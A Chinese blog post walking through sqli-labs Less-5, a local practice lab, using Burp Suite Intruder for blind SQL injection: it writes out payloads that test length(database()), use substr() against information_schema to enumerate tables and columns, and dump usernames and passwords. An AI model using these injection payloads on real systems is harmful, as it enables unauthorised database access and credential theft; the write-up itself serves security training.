8.24 sqli-lab 5 利用burpsuite进行盲注

打开靶场后用
?id=1 and 1=1(1=2) -- -
?id=1' and 1=1(1=2) -- -
尝试后确定为字符注入 同时确定列数为3
但是除界面不同外没有其他回显 所以联合注入和报错注入都不行
于是用 burpsuite进行盲注
按照顺序 首先要确定database

  • 长度:
http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(length(database())=1,sleep(0),1) -- -

用burp suite抓包后用intruder来实现 长度的递增
image
image
image
可以得出长度为8

  • 数据库名:
http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(substr(database(),1,1)='a',sleep(0),1) -- -

我们这次要枚举两个地方:
选用 cluster
image

设置两个payload 一个是1~...的数字 一个是 a~z
image
image
image
然后就得到 database:security

接下来获取 table_name:

http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a',sleep(0),1) -- -

用burp suite抓包后一样的进行盲注
可以得到 table_name: emails referers uagents users
然后对 column_name盲注:

http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1,1)='a',sleep(0),1) -- -

得到 column_name:id username password ...
最后盲注获得响应数据即可
image
可以得到像 dumb etc.的用户名 id 密码 等

posted @ 2023-08-24 17:39  N0zoM1z0  阅读(57)  评论(0编辑  收藏  举报